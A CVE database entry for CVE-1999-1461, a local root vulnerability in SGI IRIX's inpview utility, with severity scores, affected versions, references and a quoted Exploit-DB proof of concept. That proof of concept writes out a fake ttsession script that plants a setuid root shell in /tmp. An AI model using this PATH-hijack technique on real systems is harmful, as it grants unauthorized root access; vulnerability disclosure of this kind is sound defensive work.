CVE-1999-1461 : Detail

CVE-1999-1461

0.04%V3
Local
2001-09-12
02h00 +00:00
2024-08-01
17h18 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

inpview in InPerson on IRIX 5.3 through IRIX 6.5.10 trusts the PATH environmental variable to find and execute the ttsession program, which allows local users to obtain root access by modifying the PATH to point to a Trojan horse ttsession program.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19304

Publication date : 1997-05-06
22h00 +00:00
Author : Yuri Volobuev
EDB Verified : Yes

source: https://www.securityfocus.com/bid/381/info The inpview utility, included by SGI in its Irix operating system, contains a vulnerability that will allow any local user to obtain root access. inpview is part of the InPerson dektop video conferencing package. As it needs to access a video capture device, it is setuid root, and attempts to run the "ttsession" utility using the system() library call. It does not specificy an explicit path, and as such will execute the first program or script named "ttsession" in the users path. By setting /tmp to be first in your path, creating a shell script in /tmp call ttsession, and making it executable, this shell script will be executed as root. % cat > /tmp/ttsession #!/bin/sh cp /bin/sh /tmp/rootshell chmod 4755 /tmp/rootshell ^D % chmod 755 /tmp/ttsession % inpview& % /tmp/rootshell #

Products Mentioned

Configuraton 0

Sgi>>Irix >> Version 5.3

Sgi>>Irix >> Version 6.1

Sgi>>Irix >> Version 6.2

Sgi>>Irix >> Version 6.3

Sgi>>Irix >> Version 6.4

Sgi>>Irix >> Version 6.5.10

References

http://marc.info/?l=bugtraq&m=87602167420921&w=2
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/381
Tags : vdb-entry, x_refsource_BID